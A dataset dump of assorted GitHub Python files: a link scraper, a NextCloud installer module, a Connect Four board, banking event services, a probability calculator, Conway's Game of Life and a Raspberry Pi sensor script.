\"))\nprime(n)\n","repo_name":"Autobahn1racer/Python_school","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12711582832","text":"import requests\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nfrom colorama import Fore , init , Style\r\nlinks_file=open(\"links.txt\",\"w\")\r\nlink_count=0\r\ninit()\r\ndef extracting_all_links(url_req):\r\n global link_count\r\n try:\r\n response = requests.get(url_req).content\r\n html_soup = BeautifulSoup(response, 'html.parser')\r\n all_html_a = html_soup.find_all('a')\r\n for links in all_html_a:\r\n if ('href') in links.attrs:\r\n linkss = links['href']\r\n if (\"https://\") in linkss or (\"www.\") in linkss or (\"http\") in linkss:\r\n link_count+=1\r\n links_file.write(linkss+\"\\n\")\r\n print(linkss)\r\n links_file.close()\r\n init()\r\n print(f\"{Fore.GREEN}[+] Finished Links : {link_count}{Style.RESET_ALL}\")\r\n input(\"[!] Thanks For Using ..\")\r\n exit(0)\r\n except Exception:\r\n input(\"Error To URL !\")\r\nprint(f'''{Fore.YELLOW} |----------------------------------------|\r\n | [ Extractor Links In Website ] |\r\n | ----Github : TNALotaibi---- |\r\n |----------------------------------------| \r\n''')\r\nprint(f'''{Fore.YELLOW}[?] get -s target <---- if website encryption ( https:// ) \\n[?] get -n target <---- if website not encryption ( http:// ){Style.RESET_ALL}\\n''')\r\nprint(f\"{Fore.YELLOW}[+] Enter \")\r\ncommand = input(\"--> \")\r\nif not command.find(\"get -s\"):\r\n spp = command.split(\" -s \")[1]\r\n url_requests = f'https://{spp}'\r\n for _ in [\"|\", \"/\", \"-\", \"\\\\\", \"|\", \"/\", \"-\", \"\\\\\"]:\r\n time.sleep(0.2)\r\n print(f\"{Style.RESET_ALL}{Fore.LIGHTRED_EX}[{_}] Please wait .. {url_requests}{Style.RESET_ALL}\",end=\"\\r\")\r\n extracting_all_links(url_requests)\r\nelif not command.find(\"get -n\"):\r\n url_requests = f'http://{command.split(\" -n \")[1]}'\r\n for _ in [\"|\", \"/\", \"-\", \"\\\\\", \"|\", \"/\", \"-\", \"\\\\\"]:\r\n time.sleep(0.2)\r\n print(f\"{Style.RESET_ALL}{Fore.LIGHTRED_EX}[{_}] Please wait .. {url_requests}{Style.RESET_ALL}\",end=\"\\r\")\r\n extracting_all_links(url_requests)\r\nelse:\r\n input(\"Enter valid command !\")\r\n exit(0)\r\n","repo_name":"TNAlotaibi/Extractor-Links-In-Website","sub_path":"Extractor Links In Website.py","file_name":"Extractor Links In Website.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32687625050","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport os\nimport logging\nimport ebstall.errors as errors\nimport collections\nimport re\nimport requests\nimport ebstall.util as util\nimport types\nimport ebstall.osutil as osutil\nimport shutil\nimport time\nimport pkg_resources\n\nfrom ebstall.consts import PROVISIONING_SERVERS\nfrom ebstall.deployers import letsencrypt\n\n__author__ = 'dusanklinec'\nlogger = logging.getLogger(__name__)\n\n\nclass NextCloud(object):\n \"\"\"\n Nextcloud module\n \"\"\"\n WEBROOT = '/var/www/nextcloud'\n EXCLUDE_REINSTALL = ['data']\n\n def __init__(self, sysconfig=None, audit=None, write_dots=False, mysql=None, config=None, nginx=None, *args, **kwargs):\n self.sysconfig = sysconfig\n self.write_dost = write_dots\n self.audit = audit\n\n self.mysql = mysql\n self.config = config\n self.nginx = nginx\n\n self.webroot = self.WEBROOT\n self.user = 'nginx'\n self.hostname = None\n self.doing_reinstall = False\n\n self._file_nextcloud = 'nextcloud-11.0.3.zip'\n self._file_ojsxc = 'https://github.com/EnigmaBridge/jsxc-nc/archive/v3.2.0-2a.tar.gz'\n self._file_vpnauth = 'https://github.com/EnigmaBridge/user_vpnauth/archive/v1.0.1.tar.gz'\n\n def get_subdomains(self):\n \"\"\"\n Returns domains to register\n :return: \n \"\"\"\n return ['cloud']\n\n def get_domains(self):\n \"\"\"\n Full domains based on the hostname\n :return: \n \"\"\"\n return ['%s.%s' % (x, self.hostname) for x in self.get_subdomains()]\n\n def get_link(self):\n \"\"\"\n Returns the link to the main page\n :return: \n \"\"\"\n return 'https://%s/' % self.get_domains()[0]\n\n def get_extauth_endpoint(self):\n \"\"\"\n Returns endpoint for extauth plugin for ejabberd\n :return: \n \"\"\"\n domain = self.get_domains()[0]\n return 'https://%s/index.php/apps/ojsxc/ajax/externalApi.php' % domain\n\n #\n # Configuration\n #\n\n def _get_tls_paths(self):\n \"\"\"\n Returns chain & key path for TLS or None, None\n :return: keychain path, privkey path\n \"\"\"\n cert_dir = os.path.join(letsencrypt.LE_CERT_PATH, self.hostname)\n cert_path = os.path.join(cert_dir, letsencrypt.LE_CA)\n key_path = os.path.join(cert_dir, letsencrypt.LE_PRIVATE_KEY)\n return cert_path, key_path\n\n def _get_php_trusted_domains_template(self):\n \"\"\"\n Returns php file for changing owncloud settings\n :return: \n \"\"\"\n resource_package = __name__\n resource_path = '/'.join(('..', 'consts', 'nextcloud-trusteddomains.php'))\n return pkg_resources.resource_string(resource_package, resource_path)\n\n def _get_nginx_template(self):\n \"\"\"\n Returns static nginx config template\n :return: \n \"\"\"\n resource_package = __name__\n resource_path = '/'.join(('..', 'consts', 'nginx-nextcloud.conf'))\n return pkg_resources.resource_string(resource_package, resource_path)\n\n def _cfg_str(self, x):\n \"\"\"\n Returns empty string if is none\n :param x: \n :return: \n \"\"\"\n if x is None:\n return ''\n return '%s' % x\n\n def _get_nginx_cfg(self):\n \"\"\"\n Creates nginx configuration file\n :param env_path: \n :return: \n \"\"\"\n cert_path, key_path = self._get_tls_paths()\n tpl_file = self._get_nginx_template()\n tpl_file = tpl_file.replace('{{ DOMAINS }}', ','.join(self.get_domains()))\n tpl_file = tpl_file.replace('{{ TLS_CERT }}', self._cfg_str(cert_path))\n tpl_file = tpl_file.replace('{{ TLS_KEY }}', self._cfg_str(key_path))\n tpl_file = tpl_file.replace('{{ WEBROOT }}', self._cfg_str(self.webroot))\n\n # Remove all other templates not filled in\n tpl_file = re.sub(r'\\{\\{\\s*[a-zA-Z0-9_\\-]+\\s*\\}\\}', '', tpl_file)\n return tpl_file\n\n def configure(self):\n \"\"\"\n Configures Nginx\n :return: \n \"\"\"\n cfg_dir = self.nginx.http_include\n path = os.path.join(cfg_dir, 'nextcloud.conf')\n util.safely_remove(path)\n\n with util.safe_open(path, mode='w', chmod=0o644) as fh:\n fh.write(self._get_nginx_cfg()+'\\n')\n\n #\n # Installation\n #\n\n def _download_file(self, url, filename, attempts=1):\n \"\"\"\n Downloads binary file, saves to the file\n :param url:\n :param filename:\n :return:\n \"\"\"\n return util.download_file(url, filename, attempts)\n\n def _fix_privileges(self):\n \"\"\"\n Fixes privileges to the files\n :return: \n \"\"\"\n # Privileges\n storage_dir = os.path.join(self.webroot, 'storage', 'bootstrap', 'cache')\n cache_sub_dir = os.path.join(storage_dir, 'bootstrap', 'cache')\n if not os.path.exists(cache_sub_dir):\n os.makedirs(cache_sub_dir, mode=0o775)\n\n cmd = 'sudo chown %s -R \"%s\"' % (self.user, self.webroot)\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd)\n if ret != 0:\n raise errors.SetupError('Owner change failed for private space web')\n\n def _deploy_downloaded(self, archive_path, basedir):\n \"\"\"\n Analyzes downloaded file, deploys to the webroot\n :param archive_path:\n :param basedir:\n :return:\n \"\"\"\n cmd = 'sudo unzip %s' % util.escape_shell(archive_path)\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, write_dots=True, cwd=basedir)\n if ret != 0:\n raise errors.SetupError('Could not extract update archive')\n\n folders = [f for f in os.listdir(basedir) if not os.path.isfile(os.path.join(basedir, f))\n and f != '.' and f != '..']\n\n if len(folders) != 1:\n raise errors.SetupError('Invalid folder structure after update extraction')\n\n archive_dir = os.path.join(basedir, folders[0])\n if not os.path.exists(archive_dir):\n raise errors.SetupError('Directory with nextcloud not found in the update archive: %s' % archive_dir)\n if not os.path.exists(os.path.join(archive_dir, 'robots.txt')):\n raise errors.SetupError('Invalid update archive, robots.txt not found in %s' % archive_dir)\n\n archive_slash = util.add_ending_slash(archive_dir)\n dest_slash = util.add_ending_slash(self.webroot)\n\n # reinstall - preserve user data\n excludes = ''\n if self.doing_reinstall:\n full_excludes = [os.path.join(dest_slash, x) for x in self.EXCLUDE_REINSTALL]\n if os.path.exists(dest_slash):\n for d in [x for x in full_excludes if not os.path.exists(x)]:\n os.makedirs(d)\n\n excludes = ' '.join(['--exclude %s' % util.escape_shell(util.add_ending_slash(x))\n for x in full_excludes])\n\n cmd = 'sudo rsync -av --delete %s %s %s' \\\n % (excludes, util.escape_shell(archive_slash), util.escape_shell(dest_slash))\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, write_dots=True, cwd=basedir)\n if ret != 0:\n raise errors.SetupError('nextcloud sync failed')\n\n self._fix_privileges()\n\n def _install(self, attempts=3):\n \"\"\"\n Downloads NextCloud installation file from provisioning server.\n :return:\n \"\"\"\n base_file = self._file_nextcloud\n try:\n logger.debug('Going to download nextcloud from the provisioning servers')\n for provserver in PROVISIONING_SERVERS:\n url = 'https://%s/nextcloud/%s' % (provserver, base_file)\n tmpdir = util.safe_new_dir('/tmp/nextcloud-install')\n\n try:\n self.audit.audit_evt('prov-nextcloud', url=url)\n\n # Download archive.\n archive_path = os.path.join(tmpdir, base_file)\n self._download_file(url, archive_path, attempts=attempts)\n\n # Install\n self._deploy_downloaded(archive_path, tmpdir)\n return 0\n\n except errors.SetupError as e:\n logger.debug('SetupException in fetching NextCloud from the provisioning server: %s' % e)\n self.audit.audit_exception(e, process='prov-nextcloud')\n\n except Exception as e:\n logger.debug('Exception in fetching NextCloud from the provisioning server: %s' % e)\n self.audit.audit_exception(e, process='prov-nextcloud')\n\n finally:\n if os.path.exists(tmpdir):\n shutil.rmtree(tmpdir)\n\n return 0\n\n except Exception as e:\n logger.debug('Exception when fetching NextCloud')\n self.audit.audit_exception(e)\n raise errors.SetupError('Could not install NextCloud', cause=e)\n\n def _occ_cmd(self, cmd, require_zero_result=True):\n \"\"\"\n Calls OCC command, returns ret, out, err\n :param cmd: \n :return: \n \"\"\"\n cmd = 'sudo -u %s php occ %s ' % (self.user, cmd)\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, cwd=self.webroot)\n if require_zero_result and ret != 0:\n raise errors.SetupError('OCC call failed')\n\n return ret, out, err\n\n def _occ_install(self):\n \"\"\"\n Owncloud installer script\n :return: \n \"\"\"\n admin_pass = util.random_password(14)\n self.config.nextcloud_admin_pass = admin_pass\n self.audit.add_secrets(admin_pass)\n\n # drop previous database before installation\n self.mysql.drop_database('owncloud')\n\n # install with OCC cmd\n cmd = 'maintenance:install ' \\\n ' --database mysql --database-name owncloud --database-user root --database-pass %s ' \\\n ' --admin-user admin --admin-pass %s' % (self.mysql.get_root_password(), admin_pass)\n self._occ_cmd(cmd)\n\n def _occ_set_config(self, app, key, value):\n \"\"\"\n Sets OCC config value\n :param key: \n :param value: \n :return: \n \"\"\"\n cmd = 'config:app:set --value %s %s %s' \\\n % (util.escape_shell(value), util.escape_shell(app), util.escape_shell(key))\n self._occ_cmd(cmd)\n\n def _occ_get_config(self, app, key):\n \"\"\"\n Gets OCC config value\n :param key: \n :return: \n \"\"\"\n cmd = 'config:app:get %s %s' % (util.escape_shell(app), util.escape_shell(key))\n ret, out, err = self._occ_cmd(cmd, require_zero_result=False)\n if ret != 0:\n return None\n return out.strip()\n\n def _trusted_domains(self):\n \"\"\"\n Trusted domains configuration - modifies config.php and adds current domain to the trusted_domains config key\n :return: \n \"\"\"\n cfg_path = os.path.join(self.webroot, 'config', 'config.php')\n if not os.path.exists(cfg_path):\n logger.warning('NextCloud config file not found: %s' % cfg_path)\n raise errors.SetupError('NextCloud config file not found')\n\n tpl_file = self._get_php_trusted_domains_template()\n tpl_file = tpl_file.replace('{{ CONFIG_FILE }}', cfg_path)\n tpl_file = re.sub(r'\\{\\{\\s*[a-zA-Z0-9_\\-]+\\s*\\}\\}', '', tpl_file)\n\n php_file = os.path.join(self.webroot, 'ebstall-config.php')\n util.safely_remove(php_file)\n with util.safe_open(php_file, 'w', 0o755) as fw:\n fw.write(tpl_file)\n\n domains_list = ' '.join(self.get_domains() + [self.hostname])\n cmd = 'sudo -u %s php %s %s ' \\\n % (self.user, php_file, domains_list)\n\n ret, out, err = self.sysconfig.cli_cmd_sync(cmd, cwd=self.webroot)\n if ret != 0:\n raise errors.SetupError('Owner change failed for private space web')\n\n if isinstance(out, types.ListType):\n out = ''.join(out)\n\n new_cfg = '= 0 and col < self.width)\n \n row = 0\n while self.slots[row][col] == ' ' and row < self.height - 1:\n if self.slots[row + 1][col] == ' ': \n row += 1\n else:\n break\n \n self.slots[row][col] = checker\n \n def reset(self):\n \"\"\" resets the Board object self by setting\n all slots to contain a space character\n \"\"\"\n self.__init__(self.height, self.width)\n \n def add_checkers(self, colnums):\n \"\"\" takes a string of column numbers and places alternating\n checkers in those columns of the called Board object,\n starting with 'X'.\n input: colnums is a string of valid column numbers\n \"\"\"\n checker = 'X' # start by playing 'X'\n\n for col_str in colnums:\n col = int(col_str)\n if 0 <= col < self.width:\n self.add_checker(checker, col)\n\n if checker == 'X':\n checker = 'O'\n else:\n checker = 'X'\n\n def can_add_to(self, col):\n \"\"\" checks if it is valid to place a checker\n in column col on the Board object self\n \"\"\"\n if col >= 0 and col < self.width:\n if self.slots[0][col] == ' ':\n return True\n return False\n \n def is_full(self):\n \"\"\" checks if the Board object self is completely full\n \"\"\"\n for col in range(self.width):\n if self.can_add_to(col) == True:\n return False\n \n return True\n \n def remove_checker(self, col):\n \"\"\" removes the top checker from column col of the Board object self\n \"\"\"\n top = 0\n for row in range(self.height):\n if self.slots[row][col] != ' ':\n top = row\n break\n \n self.slots[top][col] = ' '\n \n def is_horizontal_win(self, checker):\n \"\"\" Checks for a horizontal win for the specified checker\n \"\"\"\n for row in range(self.height):\n for col in range(self.width - 3):\n if self.slots[row][col] == checker and \\\n self.slots[row][col + 1] == checker and \\\n self.slots[row][col + 2] == checker and \\\n self.slots[row][col + 3] == checker:\n return True\n\n return False\n \n def is_vertical_win(self, checker):\n \"\"\" Checks for a vertical win for the specified checker\n \"\"\"\n for row in range(self.height - 3):\n for col in range(self.width):\n if self.slots[row][col] == checker and \\\n self.slots[row + 1][col] == checker and \\\n self.slots[row + 2][col] == checker and \\\n self.slots[row + 3][col] == checker:\n return True\n\n return False \n \n def is_down_diagonal_win(self, checker):\n \"\"\" Checks for a downward diagonal win for the specified checker\n \"\"\"\n for row in range(self.height - 3):\n for col in range(self.width - 3):\n if self.slots[row][col] == checker and \\\n self.slots[row + 1][col + 1] == checker and \\\n self.slots[row + 2][col + 2] == checker and \\\n self.slots[row + 3][col + 3] == checker:\n return True\n\n return False\n \n def is_up_diagonal_win(self, checker):\n \"\"\" Checks for an upward diagonal win for the specified checker\n \"\"\"\n for row in range(self.height - 3, self.height):\n for col in range(self.width - 3):\n if self.slots[row][col] == checker and \\\n self.slots[row - 1][col + 1] == checker and \\\n self.slots[row - 2][col + 2] == checker and \\\n self.slots[row - 3][col + 3] == checker:\n return True\n\n return False\n \n def is_win_for(self, checker):\n \"\"\" returns True if there are four consecutive slots\n containing checker on the Board object self\n \"\"\"\n assert(checker == 'X' or checker == 'O')\n \n if self.is_horizontal_win(checker) == True or \\\n self.is_vertical_win(checker) == True or \\\n self.is_down_diagonal_win(checker) == True or \\\n self.is_up_diagonal_win(checker) == True:\n return True\n return False\n ","repo_name":"munirsidd/connect-four","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14011291303","text":"from miniagent import configure\nfrom miniagent.executer import ExecuterInterface\nfrom miniagent.adapters.rest_caller import RESTCaller\nfrom miniagent.adapters.opensearch_caller import OpensearchCaller\n\nclass Summation(ExecuterInterface):\n\n def _parcer(self, response):\n q = response.get('aggregations').get('deposit_account_grp').get('buckets')\n \n qq = [ {\n \"account\":row['key'], \n \"count\":row['doc_count'], \n \"amount_sum\":row['amount_sum']['value']\n } for row in q]\n\n return {\"results\":qq}\n\n def execute_command(self, \n initial_param: dict,\n os_caller: OpensearchCaller,\n ) -> tuple[int, dict]:\n \n url = \"http://\"+configure.get('ELASTIC_SEARCH_DOMAIN_NAME')\\\n +\":\"+configure.get('ELASTIC_SEARCH_PORT')\n \n index = 'deposit.raffle'\n query =\\\n {\n \"query\": {\n \"match_all\": {}\n },\n \"size\": 0,\n \"aggs\": {\n \"deposit_account_grp\": {\n \"terms\": {\n \"field\": \"account.keyword\"\n },\n \"aggs\": {\n \"amount_sum\": {\n \"sum\": {\n \"field\": \"amount\"\n }\n }\n }\n }\n }\n }\n\n return os_caller.call_get(url, index, query, self._parcer)\n\n\nclass Event(ExecuterInterface):\n\n def execute_command(self, \n initial_param: dict,\n rest_caller: RESTCaller,\n ) -> tuple[int, dict]:\n \n account = configure.get('AGENT_NAME')\n\n url = \"http://\"+configure.get('SERVICE_ENDPOINT').get('raffle')+\"/raffle/all\"\n \n status, result = rest_caller.call_get(url=url)\n\n for row in result.get('results'):\n \n descriptions = dict(\n EVENT_10M_BY_ACCOUNT = \"## {}님의 입금액이 천만원을 넘었습니다. 상금으로 2천만원을 드립니다.\".format(row['account']),\n EVENT_100M = \"## {}님의 입금으로 KDB산업은행 총 입금액이 1억원을 돌파하였습니다. 상금으로 2억원을 드립니다.\".format(row['account']),\n EVENT_1M_BY_ACCOUNT = \"## {}님의 입금액이 100만원을 넘었습니다. 상금으로 200만원을 드립니다.\".format(row['account']),\n EVENT_10M = \"## {}님의 입금으로 KDB산업은행 총 입금액이 천만원을 돌파하였습니다. 상금으로 2천만원을 드립니다.\".format(row['account']),\n )\n row.update(dict(\n description = descriptions[row.get('event_id')] if descriptions.get(row.get('event_id')) else \"Expired Event\"\n ))\n\n return status, result\n\nclass CheckEvent(ExecuterInterface):\n\n def execute_command(self, \n initial_param: dict,\n rest_caller: RESTCaller,\n ) -> tuple[int, dict]:\n \n url = \"http://\"+configure.get('SERVICE_ENDPOINT').get('event')+\"/event\"\n \n headers = {}\n if configure.get('C_ROLE'):\n headers.update({'x-role':configure.get('C_ROLE')})\n\n return rest_caller.call_get(url=url, headers=headers)\n \nclass CheckAmount(ExecuterInterface):\n\n def execute_command(self, \n initial_param: dict,\n rest_caller: RESTCaller,\n ) -> tuple[int, dict]:\n\n headers = {}\n if configure.get('C_ROLE'):\n headers.update({'x-role':configure.get('C_ROLE')})\n\n url = \"http://\"+configure.get('SERVICE_ENDPOINT').get('event')+\"/summation\"\n \n return rest_caller.call_get(url=url, headers=headers)","repo_name":"tanminkwan/banking-poc","sub_path":"banking/executer/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2565857775","text":"from itertools import product, repeat, combinations, groupby, accumulate\nfrom fractions import Fraction\nfrom functools import reduce, partial\n\ndef messe(sac, N=4, list_to_print=False, only_print=True, percentage_float=False):\n \"\"\"\n sac : iterable de string contenant tous les membres non moines dans le sac :\n Exemples:\n 'rrb'\n 'r1 r2 b'.split()\n N : nombre de personnes à prendre\n \n list_to_print = True:\n Output : tab, G.\n tab = [['r', 'r', 'b', '-', 53.3] for i in range(G)]\n \n only_print = True:\n Output : None, pretty print to console\n \n only_print = False:\n Output : the pretty string, G\n \n \"\"\"\n sac = list(sac)\n \n placement = '-' * max(map(len,sac))\n \n sac = [placement if all(c == '-' for c in s) else s for s in sac]\n \n D = [placement] * 4 + sac\n \n def special_underscore(string):\n return (0,) if string == placement else (1,string)\n \n L = sorted(map(partial(sorted,key=special_underscore), combinations(D,N)))\n \n G = sorted(\n (\n (sum(1 for u in b), len(L), v)\n for v,b in groupby(L)\n ),\n reverse = True,\n key = lambda t: (t[0], t[2])\n )\n to_percentage = float if percentage_float else int\n \n if list_to_print:\n return [\n v + [to_percentage(float(num) / float(den) * 100)]\n for num, den, v in G\n ], len(G)\n \n widths = (\n max(len(str(num)) for num, den, v in G),\n max(len(str(Fraction(num,den).numerator)) for num, den, v in G),\n max(len(str(Fraction(num,den).denominator)) for num, den, v in G),\n )\n \n format_text = \"| {value} | {pourcent:2}%% | {num:%d}/{den} | {snum:%d}/{sden:%d} |\" % widths\n format_value = \"{:>%d}\" % max(map(len,sac))\n \n res = '\\n'.join(\n format_text.format(\n num = num,\n den = den,\n snum = Fraction(num,den).numerator,\n sden = Fraction(num,den).denominator,\n pourcent = to_percentage(float(num) / float(den) * 100),\n value = ' '.join(map(format_value.format, v))\n )\n for num, den, v in G\n ), len(G)\n \n if only_print:\n print(res[0])\n else:\n return res\n \ndef generate_all():\n colors = 'ABCDEFGHIJ'\n \n def chaine_for_possib(possib):\n '''\n Input: possib (2,1,2,0)\n Output: AABCC\n '''\n return ''.join(c * p for c,p in zip(colors, possib))\n \n def n_different(possib):\n '''\n Input: possib (2,1,2,0)\n Output: 3\n '''\n return sum(bool(p) for p in possib)\n \n def filtre(possib):\n # return n_different(possib) in (2,)\n return True\n \n def tri(possib):\n n = n_different(possib)\n \n #return (n, sum(possib))\n \n return (\n max(messe(chaine_for_possib(possib),i,only_print=False)[1] for i in (1,2,3,4)),\n n,\n sum(possib)\n )\n \n if n == 1:\n return (n,)\n else:\n return (1000,sum(possib))\n \n height_head = 1\n height_line = 0.5\n \n affichage = 0\n \n all_choices = product(*repeat(range(5), 4))\n all_choices_set = (tuple(reversed(a)) for a,b in groupby(sorted(map(sorted, all_choices))))\n \n nt = 0\n for possib in sorted(filter(filtre, all_choices_set), key=tri):\n if affichage == 0:\n pretty_possib = ', '.join(\n str(p) + c\n for c,p in zip(colors,possib)\n if p != 0\n )\n print('{} + 4 moines'.format(pretty_possib))\n else:\n pretty_possib = ' '.join(map(str,possib))\n print('\\n# Sac : {} + 4 moines #\\n'.format(pretty_possib))\n \n nt += height_head\n \n n = 0\n saves = []\n for i in (1,2,3,4):\n text, m = messe(\n chaine_for_possib(possib),\n i,\n list_to_print = affichage == 0,\n only_print=False\n )\n saves.append(text)\n if affichage == 1:\n print(\"+ {}\\n{}\\n\".format(i, text))\n n = max(n,m)\n \n nt += n * height_line\n \n if affichage == 0:\n print('\\n'.join(\n ';'.join(reduce(\n lambda x,y: x+y,\n (\n saves[j][i][:-1] + [str(saves[j][i][-1]) + '%']\n if i in range(len(saves[j]))\n else [''] * len(saves[j][0])\n for j in range(len(saves))\n )\n ))\n for i in range(n)\n ))\n \n if affichage in (1,2):\n print(n, 'lignes')\n if affichage in (1,2,3):\n print(nt, 'cm')\n\ndef get_binary_proba(my_mepples, other_meeples, number_to_take):\n ''' len(return) == min(N,i)'''\n return list(reversed(\n list(map(int, accumulate(\n (lambda L:L[:-1])(list(map(lambda x: x[-1],\n sorted(messe('a' * my_mepples + '-' * other_meeples, number_to_take, True, True, True)[0],\n key=lambda l:l.count('a'),\n reverse=True)\n )))\n )))\n ))\n\ndef generate_all_binary(M=15):\n for i in (1,2,3,4):\n for o in range(M+1):\n ligne = []\n for N in (4,3,2,1):\n ligne += get_binary_proba(i, o, N) + ['|']\n print(';'.join(map(str,ligne)))\n\nimport sys\n\nif __name__ == '__main__':\n if 'generate' in sys.argv:\n generate_all()\n else:\n print(\"Examples of bag:\\n rrb\\n r1 r2 b\\n r--\")\n while True:\n try:\n string = input('Bag ? ').strip()\n N = int(input('Number ? '))\n if ' ' in string:\n messe(string.split(), N)\n else:\n messe(string, N)\n except ValueError:\n pass\n\n# messe('r1 r2 b'.split(), 2)\n# for i in (1,2,3,4): messe('r' * 5, i)\n# generate_all()","repo_name":"robertvandeneynde/python","sub_path":"gameutils/descendance.py","file_name":"descendance.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"41419133815","text":"\"\"\"Conway's Game of Life, by Al Sweigart al@inventwithpython.com\nThe classic cellular automata simulation. Press Ctrl-C to stop.\nMore info at: https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\nThis code is available at https://nostarch.com/big-book-small-python-programming\nTags: short, artistic, simulation\"\"\"\n\nimport copy, random, sys, time\n\n# 상수 설정:\nWIDTH = 79 # 셀 그리드의 폭\nHEIGHT = 20 # 셀 그리드의 높이\n\n# (!) ALIVE의 값을 '#'이나 다른 문자로 바꿔 보자:\nALIVE = 'O' # 살아 있는 셀을 나타내는 문자\n# (!) DEAD의 값을 '.'이나 다른 문자로 바꿔 보자:\nDEAD = ' ' # 죽어 있는 셀을 나타내는 문자\n\n# (!) ALIVE를 '|'로 DEAD를 '-'로 바꿔 보자.\n\n# cells와 nextCells는 상태에 대한 값을 가지고 있는 딕셔너리다.\n# 키는 (x, y) 튜플이며,\n# 값은 ALIVE 또는 DEAD 값 중 하나다.\nnextCells = {}\n# nextCells에 DEAD와 ALIVE를 무작위로 넣는다:\nfor x in range(WIDTH): # 모든 행에 대해 루프를 돈다.\n for y in range(HEIGHT): # 모든 열에 대해 루프를 돈다.\n # DEAD나 ALIVE가 될 확률은 50퍼센트다.\n if random.randint(0, 1) == 0:\n nextCells[(x, y)] = ALIVE # ALIVE를 추가한다.\n else:\n nextCells[(x, y)] = DEAD # DEAD를 추가한다.\n\nwhile True: # 프로그램의 메인 루프\n # 이 루프에서의 반복은 시뮬레이션의 단계다.\n\n print('\\n' * 50) # 각 단계를 개행 문자로 구분한다.\n cells = copy.deepcopy(nextCells)\n\n # 모든 셀을 화면에 출력한다:\n for y in range(HEIGHT):\n for x in range(WIDTH):\n print(cells[(x, y)], end='') # 문자 또는 공백을 출력한다.\n print() # 한 행의 모든 열을 출력했다면 개행한다.\n print('Press Ctrl-C to quit.')\n\n # 현재 단계의 셀을 바탕으로 다음 단계의 셀을 계산한다:\n for x in range(WIDTH):\n for y in range(HEIGHT):\n # (x, y)의 주변 좌표를 가져온다.\n # 가장자리는 서로 연결되어 있다.\n left = (x - 1) % WIDTH\n right = (x + 1) % WIDTH\n above = (y - 1) % HEIGHT\n below = (y + 1) % HEIGHT\n\n # 주변에 살아 있는 셀을 센다:\n numNeighbors = 0\n if cells[(left, above)] == ALIVE:\n numNeighbors += 1 # 왼쪽-상단 셀은 살아 있다.\n if cells[(x, above)] == ALIVE:\n numNeighbors += 1 # 상단 셀은 살아 있다.\n if cells[(right, above)] == ALIVE:\n numNeighbors += 1 # 오른쪽-상단 셀은 살아 있다.\n if cells[(left, y)] == ALIVE:\n numNeighbors += 1 # 왼쪽 셀은 살아 있다.\n if cells[(right, y)] == ALIVE:\n numNeighbors += 1 # 오른쪽 셀은 살아 있다.\n if cells[(left, below)] == ALIVE:\n numNeighbors += 1 # 왼쪽-하단 셀은 살아 있다.\n if cells[(x, below)] == ALIVE:\n numNeighbors += 1 # 하단 셀은 살아 있다.\n if cells[(right, below)] == ALIVE:\n numNeighbors += 1 # 오른쪽-하단 셀은 살아 있다.\n\n # 콘웨이의 라이프 게임 규칙을 기반으로 셀을 설정한다:\n if cells[(x, y)] == ALIVE and (numNeighbors == 2\n or numNeighbors == 3):\n # 현재 셀이 살아 있으면서 주변에 살아 있는 셀이 2 또는 3이면, 다음 단계에서도 살아 있는 셀이 된다:\n nextCells[(x, y)] = ALIVE\n elif cells[(x, y)] == DEAD and numNeighbors == 3:\n # 현재 셀이 죽어 있으면서 주변에 살아 있는 셀이 3이면, 다음 단계에서 살아 있는 셀이 된다:\n nextCells[(x, y)] = ALIVE\n else:\n # 그 외의 모든 셀은 죽은 상태가 된다:\n nextCells[(x, y)] = DEAD\n\n try:\n time.sleep(1) # 1초 동안 일시 중지하여 출력된 것을 확인할 수 있게 한다.\n except KeyboardInterrupt:\n print(\"Conway's Game of Life\")\n print('By Al Sweigart al@inventwithpython.com')\n sys.exit() # Ctrl-C가 눌리면 프로그램을 종료한다.\n","repo_name":"Jpub/PyProject","sub_path":"conwaysgameoflife.py","file_name":"conwaysgameoflife.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"11106462627","text":"import RPi.GPIO as GPIO\nimport time\nimport logging\nimport api\nimport os\nimport util\n\nLAST_MOVEMENT=0\nLAST_API_CALL=0\n\nSENSOR_PIN=0\nRED_PIN=0\nYELLOW_PIN=0\nGREEN_PIN=0\n\ndef eventRegistered(channel):\n logging.debug(\"New Callback\")\n api.setStatusOpen()\n GPIO.output(GREEN_PIN,GPIO.HIGH)\n GPIO.output(RED_PIN, GPIO.LOW)\n GPIO.output(YELLOW_PIN, GPIO.LOW)\n global LAST_MOVEMENT\n LAST_MOVEMENT=util.getCurrentTime()\n logging.debug(\"Callback finished\")\n\ndef main():\n global SENSOR_PIN\n global RED_PIN\n global YELLOW_PIN\n global GREEN_PIN\n SENSOR_PIN=int(os.environ.get(\"SENSOR_PIN\"))\n RED_PIN=int(os.environ.get(\"RED_PIN\"))\n YELLOW_PIN=int(os.environ.get(\"YELLOW_PIN\"))\n GREEN_PIN=int(os.environ.get(\"GREEN_PIN\"))\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(SENSOR_PIN, GPIO.IN)\n GPIO.setup(RED_PIN, GPIO.OUT)\n GPIO.setup(YELLOW_PIN, GPIO.OUT)\n GPIO.setup(GREEN_PIN, GPIO.OUT)\n try:\n logging.info('Register callback for pin: %s', SENSOR_PIN)\n\n 